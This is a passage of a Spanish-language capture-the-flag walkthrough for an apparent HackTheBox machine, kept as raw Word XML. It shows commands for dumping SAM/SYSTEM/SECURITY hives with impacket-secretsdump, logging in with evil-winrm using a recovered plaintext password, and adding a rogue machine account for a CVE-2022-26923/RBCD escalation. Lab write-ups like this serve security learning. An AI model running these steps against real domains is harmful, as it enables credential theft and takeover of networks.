        <w:t xml:space="preserve">: Son los archivos de hives que contienen la información de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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LOCAL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Indica que los archivos están en el sistema local.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Así que procedemos a realizar una copia de nuestros archivos para extraer los datos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Con el comando CP procedemos a realizar una copia de los archivos SAM, SYSTEM Y SECURITY y renombradolos respectivamente </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp 0xffffd3067d935000-SAM-MACHINE_SAM.reghive ../../../SAM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1231900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="1231900"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3600450" cy="1133475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3600450" cy="1133475"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Asi que ya procedemos a correr nuestra impacket-secretsdump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="342900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="573120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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">encontrando con una contraseña que está en texto plano</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3162300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="57312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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La contraseña pertenecia al usuario de lorra199</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">así que utilizamos el comando </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">evil-winrm -i 10.10.11.5 -u lorra199 -p PWN3D#l0rr@Armessa199 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5391150" cy="485775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="30" name="image40.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image40.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5391150" cy="485775"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">y con esto tenemos una conexión </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3800475" cy="266700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10" name="image3.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image3.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3800475" cy="266700"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Si buscamos información del usuario vemos que pertenece a el grupo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administración Remota</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usuarios de Dominio </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cesta de Reciclaje AD: La "Cesta de Reciclaje AD" (Active Directory Recycle Bin) es una característica de Active Directory introducida en Windows Server 2008 R2 que permite a los administradores recuperar objetos eliminados de Active Directory sin necesidad de restaurar desde una copia de seguridad. Esta característica facilita la recuperación de objetos como usuarios, grupos, unidades organizativas (OUs), etc., de manera rápida y eficiente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3606800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15" name="image13.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="57312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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">investigando un poco sobre la escalada de privilegios encontramos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId50">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://juggernaut-sec.com/cve-2022-26923-certifried/#Overview_What_is_CVE-2022-26923</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2022-26923 es una vulnerabilidad de escalada de privilegios que afecta a AD CS (Servicios de certificados de Active Directory) en un entorno de dominio de Active Directory. Cuando AD CS está habilitado, un usuario estándar, o cualquier usuario, tiene la capacidad de generar plantillas de usuario y de computadora. Curiosamente, cualquier certificado generado por cualquier usuario permitirá la autenticación en el nuevo objeto.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilizamos el script addcomputer que descargamos desde git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script de Python utilizado para agregar computadoras a un dominio o a un entorno administrado, posiblemente en un contexto de Active Directory (AD) u otra infraestructura de TI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId51">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/fortra/impacket/blob/master/examples/addcomputer.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Corremos nuestro script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 addcomputer.py -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host freelancer.htb -domain-netbios freelancer.htb freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="533400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="533400"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">la explotación de Active Directory mediante un ataque específico conocido como "Resource-Based Constrained Delegation" (RBCD). Este tipo de ataque permite a un atacante abusar de la delegación de recursos en un entorno de Active Directory para escalar privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
